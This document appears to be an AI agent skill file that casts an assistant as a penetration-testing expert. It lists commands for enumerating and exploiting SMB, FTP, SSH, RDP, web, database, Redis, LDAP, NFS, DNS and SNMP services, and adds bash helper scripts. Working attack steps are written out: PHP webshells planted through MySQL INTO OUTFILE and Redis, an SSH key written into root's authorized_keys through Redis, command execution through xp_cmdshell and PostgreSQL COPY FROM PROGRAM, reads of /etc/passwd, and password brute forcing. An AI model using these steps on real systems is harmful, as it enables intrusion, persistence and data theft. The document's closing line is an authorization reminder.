skills/network-service-enumeration/SKILL.md
Enumerate and exploit network services including SMB, FTP, SSH, RDP, HTTP, databases (MySQL, MSSQL, PostgreSQL, MongoDB), LDAP, NFS, DNS, and SNMP. Use when testing network service security or performing port-based exploitation.
You are a network penetration testing expert specializing in service enumeration and exploitation. Use this skill when the user requests help with:
Nmap Scanning Strategies:
# Quick TCP scan
nmap -sC -sV -oA scan 10.10.10.10
# Full TCP port scan (fast sweep first, then version/script scan of what it found)
nmap -p- -T4 10.10.10.10
sudo nmap -p- -A -T4 10.10.10.10 -oA full-scan # -A already implies -sV and -sC (plus -O and --traceroute, which need root)
# UDP scan (top 1000)
sudo nmap -sU --top-ports 1000 10.10.10.10
# Aggressive scan
nmap -A -T4 10.10.10.10
# Specific port scan with scripts
nmap -p 445 --script smb-* 10.10.10.10
nmap -p 21 --script ftp-* 10.10.10.10
# Service version detection
nmap -sV --version-intensity 9 10.10.10.10
# OS detection
sudo nmap -O 10.10.10.10
Fast Port Scanning:
# masscan - very fast (raw sockets, so it needs root; keep --rate modest on fragile networks)
sudo masscan -p1-65535 10.10.10.10 --rate=1000
# rustscan - fast with nmap integration
rustscan -a 10.10.10.10 -- -sC -sV
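The two-stage workflow behind the commands above (fast full-port sweep, then `-sC -sV` against only the ports found open) as an added bash example that is not part of the original skill. The grepable output it parses is a constructed sample, not a real scan, and `10.10.10.10` is the placeholder target used throughout this page.

```bash
#!/usr/bin/env bash
# Stage 1: sweep all 65535 ports with grepable output (-oG).
# Stage 2: run -sC -sV only against the open ports, which is much quicker
# than -p- -sC -sV in a single pass. The text below stands in for the -oG file.
set -eu

# Constructed sample of `nmap -p- -oG -` output for one host (not a real scan).
SAMPLE_GNMAP="$(printf '%s\t%s\n%s\t%s\t%s\n' \
  'Host: 10.10.10.10 ()' 'Status: Up' \
  'Host: 10.10.10.10 ()' \
  'Ports: 21/open/tcp//ftp///, 22/open/tcp//ssh///, 445/open/tcp//microsoft-ds///, 80/open/tcp//http///, 3389/filtered/tcp//ms-wbt-server///' \
  'Ignored State: closed (65530)')"

# Print the open ports of one host from grepable output as "p1,p2,...".
# $1 = grepable text, $2 = host address to filter on.
open_ports_from_gnmap() {
  local gnmap="$1" host="$2"
  printf '%s\n' "$gnmap" | awk -v h="$host" '
    BEGIN { FS = "\t" }                       # gnmap fields are tab separated
    $1 == "Host: " h " ()" {
      for (i = 2; i <= NF; i++) {
        if (index($i, "Ports: ") != 1) continue
        n = split(substr($i, 8), entries, ", ")
        for (j = 1; j <= n; j++) {
          split(entries[j], f, "/")           # port/state/proto/owner/service/...
          if (f[2] == "open") print f[1]      # filtered ports are listed too; skip them
        }
      }
    }' | sort -n | paste -sd, -
}

# Build the stage-2 command for the ports found (prints it, does not run it).
followup_scan_cmd() {
  local host="$1" ports="$2"
  printf 'nmap -p %s -sC -sV -oA %s-targeted %s\n' "$ports" "$host" "$host"
}

ports="$(open_ports_from_gnmap "$SAMPLE_GNMAP" 10.10.10.10)"
echo "open ports: $ports"               # 21,22,80,445
followup_scan_cmd 10.10.10.10 "$ports"  # nmap -p 21,22,80,445 -sC -sV -oA 10.10.10.10-targeted 10.10.10.10

# Against a real host, feed the sweep output in instead of the sample:
#   sudo nmap -p- --min-rate 1000 -oG sweep.gnmap 10.10.10.10
#   followup_scan_cmd 10.10.10.10 "$(open_ports_from_gnmap "$(cat sweep.gnmap)" 10.10.10.10)"
```

The filter on the state field matters: nmap lists `filtered` and `open|filtered` ports in the `Ports:` field as well, and passing those to the targeted scan wastes script time on ports that never answer.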
SMB Enumeration:
# Nmap SMB scripts
nmap -p 445 --script smb-protocols 10.10.10.10
nmap -p 445 --script smb-security-mode 10.10.10.10
nmap -p 445 --script smb-enum-shares 10.10.10.10
nmap -p 445 --script smb-enum-users 10.10.10.10
# smbclient - list shares
smbclient -L //10.10.10.10 -N
smbclient -L //10.10.10.10 -U username
# smbmap
smbmap -H 10.10.10.10
smbmap -H 10.10.10.10 -u username -p password
smbmap -H 10.10.10.10 -u username -p password -R # Recursive listing
# enum4linux
enum4linux -a 10.10.10.10
enum4linux -U -M -S -P -G 10.10.10.10
# crackmapexec
crackmapexec smb 10.10.10.10
crackmapexec smb 10.10.10.10 -u '' -p '' # Null session
crackmapexec smb 10.10.10.10 -u username -p password --shares
crackmapexec smb 10.10.10.10 -u username -p password --users
Connect to Shares:
# smbclient
smbclient //10.10.10.10/share -U username
smbclient //10.10.10.10/share -N # Null session
# Mount SMB share
mount -t cifs //10.10.10.10/share /mnt/smb -o username=user,password=pass
# Download all files recursively
smbget -R smb://10.10.10.10/share -U username
SMB Vulnerabilities:
# EternalBlue (MS17-010)
nmap -p 445 --script smb-vuln-ms17-010 10.10.10.10
# Other SMB vulns
nmap -p 445 --script smb-vuln-* 10.10.10.10
FTP Enumeration:
# Connect anonymously
ftp 10.10.10.10
# user: anonymous, pass: any string (by convention an e-mail address)
# Nmap FTP scripts
nmap -p 21 --script ftp-anon 10.10.10.10
nmap -p 21 --script ftp-bounce 10.10.10.10
nmap -p 21 --script ftp-brute 10.10.10.10
# Download all files (credentials are anonymous:anonymous)
wget -r ftp://anonymous:anonymous@10.10.10.10/
FTP Commands:
# In FTP session
ls -la
cd directory
get filename # Download
mget * # Download multiple
put filename # Upload
binary # Set binary mode for binaries
SSH Enumeration:
# Banner grab
nc 10.10.10.10 22
nmap -p 22 -sV 10.10.10.10
# Enumerate users (username enumeration via CVE-2018-15473, OpenSSH before 7.7)
./ssh-user-enum.py --port 22 --userList users.txt 10.10.10.10
# Brute force (use carefully)
hydra -l root -P wordlist.txt ssh://10.10.10.10
SSH Key Auth:
# Fix key permissions first; ssh refuses group/world-readable private keys
chmod 600 id_rsa
# Connect with key (user is a placeholder)
ssh -i id_rsa user@10.10.10.10
# Generate SSH key pair
ssh-keygen -t rsa -b 4096
Web Enumeration:
# Whatweb - identify web technologies
whatweb http://10.10.10.10
# Nikto vulnerability scanner
nikto -h http://10.10.10.10
# Directory/file bruteforce
gobuster dir -u http://10.10.10.10 -w /usr/share/wordlists/dirb/common.txt
feroxbuster -u http://10.10.10.10 -w wordlist.txt
ffuf -u http://10.10.10.10/FUZZ -w wordlist.txt
# DNS subdomain enumeration
gobuster dns -d example.com -w subdomains.txt
ffuf -u http://FUZZ.example.com -w subdomains.txt
# Virtual host discovery
gobuster vhost -u http://10.10.10.10 -w vhosts.txt
SSL/TLS Testing:
# Check SSL certificate (-servername sets SNI, needed when several vhosts share one IP)
openssl s_client -connect 10.10.10.10:443 -servername example.com
# SSL vulnerabilities
nmap -p 443 --script ssl-* 10.10.10.10
testssl.sh https://10.10.10.10
RDP Enumeration:
# Nmap
nmap -p 3389 --script rdp-* 10.10.10.10
# Check if RDP is enabled
nmap -p 3389 -sV 10.10.10.10
Connect:
# rdesktop
rdesktop 10.10.10.10
# xfreerdp
xfreerdp /u:Administrator /p:password /v:10.10.10.10
xfreerdp /u:user /d:DOMAIN /v:10.10.10.10
Brute Force:
# hydra
hydra -l administrator -P passwords.txt rdp://10.10.10.10
# crowbar
crowbar -b rdp -s 10.10.10.10/32 -u admin -C passwords.txt
MySQL Enumeration:
# Nmap
nmap -p 3306 --script mysql-* 10.10.10.10
# Connect
mysql -h 10.10.10.10 -u root -p
mysql -h 10.10.10.10 -u root
MySQL Commands:
-- Show databases
SHOW DATABASES;
USE database_name;
-- Show tables
SHOW TABLES;
DESCRIBE table_name;
-- Read data
SELECT * FROM table_name;
SELECT user,authentication_string FROM mysql.user; -- the column is named 'password' on MySQL before 5.7
-- Read files (requires the FILE privilege, and secure_file_priv must allow the path)
SELECT LOAD_FILE('/etc/passwd');
-- Write files (same FILE/secure_file_priv requirements; the target directory must be writable by the mysql user)
SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php';
-- Command execution (UDF): only works once a sys_exec UDF such as lib_mysqludf_sys has been loaded
SELECT sys_exec('whoami');
MSSQL Enumeration:
# Nmap
nmap -p 1433 --script ms-sql-* 10.10.10.10
# Connect with impacket (user and password are placeholders)
mssqlclient.py user:password@10.10.10.10
mssqlclient.py user:password@10.10.10.10 -windows-auth # Windows auth
MSSQL Commands:
-- Version
SELECT @@version;
-- Databases
SELECT name FROM sys.databases;
-- Current user
SELECT USER_NAME();
SELECT SYSTEM_USER;
-- Check if sysadmin
SELECT IS_SRVROLEMEMBER('sysadmin');
-- Enable xp_cmdshell (requires sysadmin, or the ALTER SETTINGS permission)
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
-- Execute commands
EXEC xp_cmdshell 'whoami';
PostgreSQL Enumeration:
# psql
psql -h 10.10.10.10 -U postgres
psql -h 10.10.10.10 -U postgres -d database_name
# Nmap
nmap -p 5432 --script pgsql-* 10.10.10.10
PostgreSQL Commands:
-- List databases
\l
-- Connect to database
\c database_name
-- List tables
\dt
-- Current user
SELECT current_user;
-- Read files (requires superuser or the pg_read_server_files role)
CREATE TABLE demo(t text);
COPY demo FROM '/etc/passwd';
SELECT * FROM demo;
-- Command execution (PostgreSQL 9.3+; requires superuser or the pg_execute_server_program role)
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'whoami';
SELECT * FROM cmd_exec;
MongoDB Enumeration:
# Nmap
nmap -p 27017 --script mongodb-* 10.10.10.10
# Connect (legacy mongo shell; newer installs ship mongosh, which accepts the same commands)
mongo 10.10.10.10
mongo 10.10.10.10/database
MongoDB Commands:
// Show databases
show dbs
// Use database
use database_name
// Show collections
show collections
// Find documents
db.collection.find()
db.collection.find().pretty()
// Count documents (count() is deprecated in newer shells; countDocuments() is the replacement)
db.collection.count()
// Dump all data
db.collection.find().forEach(printjson)
Redis Enumeration:
# Connect
redis-cli -h 10.10.10.10
# Nmap
nmap -p 6379 --script redis-* 10.10.10.10
Redis Exploitation:
# In redis-cli
INFO # Server info
CONFIG GET dir # Get directory
CONFIG GET dbfilename
# Write SSH key (redis must run as root and /root/.ssh must exist; Redis 7.0+
# refuses CONFIG SET dir/dbfilename unless enable-protected-configs is on).
# Pad the key with blank lines: SAVE wraps the value in RDB binary framing,
# and sshd skips lines it cannot parse but never splits one.
CONFIG SET dir /root/.ssh/
CONFIG SET dbfilename authorized_keys
SET mykey "\n\nssh-rsa AAAA...\n\n"
SAVE
# Write webshell (same padding trick; the web root must be writable by the redis user)
CONFIG SET dir /var/www/html/
CONFIG SET dbfilename shell.php
SET mykey "\n\n<?php system($_GET['cmd']); ?>\n\n"
SAVE
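Why the blank-line padding in the Redis SSH-key trick is not optional, as an added bash example that is not part of the original skill. The RDB framing bytes it writes are a constructed stand-in for the real dump format, and the public key is a constructed placeholder; `10.10.10.10` is the page's placeholder target.

```bash
#!/usr/bin/env bash
# SAVE writes the key's value inside RDB header/trailer bytes. sshd reads
# authorized_keys line by line and ignores lines it cannot parse, but it never
# splits a line, so the key must sit on a line of its own: hence "\n\n...\n\n".
set -eu

# Constructed placeholder key (not a real key).
PUBKEY='ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEXAMPLEEXAMPLEEXAMPLEEXAMPLEEXAMPLEEXAM pentester@attack-box'

# The value to SET: blank lines on both sides of the key.
padded_key_payload() {
  printf '\n\n%s\n\n' "$1"
}

# Write a file shaped like a SAVE result: header/metadata bytes, the value,
# then trailer bytes. $1 = key, $2 = yes|no (pad or not), $3 = output path.
# The surrounding bytes are constructed, not byte-exact RDB.
simulate_rdb_dump() {
  local key="$1" pad="$2" out="$3"
  {
    printf 'REDIS0009\372\011redis-ver\005x.y.z\376\000\373\001\000\000\005mykey'
    if [ "$pad" = yes ]; then padded_key_payload "$key"; else printf '%s' "$key"; fi
    printf '\377\001\002\003\004\005\006\007'
  } > "$out"
}

# Is the key on a line of its own, the way sshd needs it?
# -a treats the binary dump as text so only \n ends a line; -x = whole-line match.
key_on_own_line() {
  LC_ALL=C grep -aqxF "$2" "$1"
}

# Prints "clean" or "garbled" for a key written with ($2=yes) or without padding.
check_layout() {
  local key="$1" pad="$2" tmp
  tmp="$(mktemp)"
  simulate_rdb_dump "$key" "$pad" "$tmp"
  if key_on_own_line "$tmp" "$key"; then echo clean; else echo garbled; fi
  rm -f "$tmp"
}

echo "unpadded: $(check_layout "$PUBKEY" no)"   # garbled
echo "padded:   $(check_layout "$PUBKEY" yes)"  # clean

# Against a real target, pipe the padded payload in with -x to avoid quoting trouble:
#   padded_key_payload "$(cat ~/.ssh/id_ed25519.pub)" | redis-cli -h 10.10.10.10 -x SET mykey
```

The `-x` form is also the safer way to send the PHP webshell from the section above: redis-cli expands `\n` inside double quotes, but a shell-quoted `$_GET` is easy to get wrong.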
LDAP Enumeration:
# Nmap
nmap -p 389 --script ldap-* 10.10.10.10
# ldapsearch
ldapsearch -x -H ldap://10.10.10.10 -b "DC=domain,DC=local"
ldapsearch -x -H ldap://10.10.10.10 -D "user@domain.local" -w password -b "DC=domain,DC=local"
# Dump all
ldapsearch -x -H ldap://10.10.10.10 -b "DC=domain,DC=local" "(objectClass=*)"
NFS Enumeration:
# Show exports
showmount -e 10.10.10.10
# Nmap
nmap -p 2049 --script nfs-* 10.10.10.10
Mount NFS:
# Mount share (needs root)
sudo mkdir -p /mnt/nfs
sudo mount -t nfs 10.10.10.10:/share /mnt/nfs
# List mounted shares
df -h
DNS Enumeration:
# Zone transfer
dig axfr @10.10.10.10 domain.com
host -l domain.com 10.10.10.10
# DNS enumeration
dnsenum domain.com
dnsrecon -d domain.com -t std
fierce --domain domain.com # Python 3 rewrite; the old Perl version used -dns domain.com
# Nmap
nmap -p 53 --script dns-* 10.10.10.10
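Turning a successful zone transfer into a target list for the scans above, as an added bash example that is not part of the original skill. The records it parses are a constructed sample of `dig axfr` output for the page's placeholder zone `domain.com`, not a real transfer.

```bash
#!/usr/bin/env bash
# A records become "ip hostname" lines; CNAMEs that point inside the zone are
# resolved through those A records so aliases (often the interesting vhosts)
# are not lost. The unique IPs are what you feed to `nmap -iL`.
set -eu

# Constructed sample of `dig axfr @10.10.10.10 domain.com` output (not real data).
SAMPLE_AXFR='; <<>> DiG 9.18.1 <<>> axfr @10.10.10.10 domain.com
domain.com.          3600 IN SOA   ns1.domain.com. admin.domain.com. 2024010101 3600 900 604800 86400
domain.com.          3600 IN NS    ns1.domain.com.
ns1.domain.com.      3600 IN A     10.10.10.10
www.domain.com.      3600 IN A     10.10.10.20
dev.domain.com.      3600 IN A     10.10.10.21
intranet.domain.com. 3600 IN CNAME www.domain.com.
mail.domain.com.     3600 IN MX    10 www.domain.com.
domain.com.          3600 IN SOA   ns1.domain.com. admin.domain.com. 2024010101 3600 900 604800 86400
;; Query time: 4 msec'

# "ip hostname" for every A record, plus resolved in-zone CNAMEs.
axfr_hosts() {
  printf '%s\n' "$1" | awk '
    function clean(s) { sub(/\.$/, "", s); return s }   # drop the trailing dot
    $3 == "IN" && $4 == "A"     { a[clean($1)] = $5 }
    $3 == "IN" && $4 == "CNAME" { c[clean($1)] = clean($5) }
    END {
      for (h in a) print a[h], h
      for (h in c) if (c[h] in a) print a[c[h]], h, "(CNAME " c[h] ")"
    }' | LC_ALL=C sort
}

# Unique IPs only, ready for `nmap -iL targets.txt`.
axfr_targets() {
  axfr_hosts "$1" | awk '{ print $1 }' | LC_ALL=C sort -u
}

axfr_hosts "$SAMPLE_AXFR"
# Real run:
#   axfr_targets "$(dig axfr @10.10.10.10 domain.com)" > targets.txt
#   sudo nmap -sC -sV -iL targets.txt -oA zone-hosts
```

Records other than A and CNAME (SOA, NS, MX, TXT) are skipped here; MX and NS names usually resolve to A records already in the zone, and if they do not, the hostnames are still worth noting for the DNS subdomain and vhost brute-forcing steps in the Web Enumeration section.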
SNMP Enumeration:
# snmpwalk
snmpwalk -v2c -c public 10.10.10.10
snmpwalk -v2c -c public 10.10.10.10 1.3.6.1.2.1.1
# onesixtyone - community string brute force
onesixtyone -c community.txt 10.10.10.10
# snmp-check
snmp-check 10.10.10.10 -c public
Banner Grabbing:
# Netcat
nc -nv 10.10.10.10 80
nc -nv 10.10.10.10 21
# Telnet
telnet 10.10.10.10 80
telnet 10.10.10.10 25
# Nmap
nmap -sV --script=banner 10.10.10.10
Activate this skill when the user asks to:
Always ensure proper authorization before testing any network services.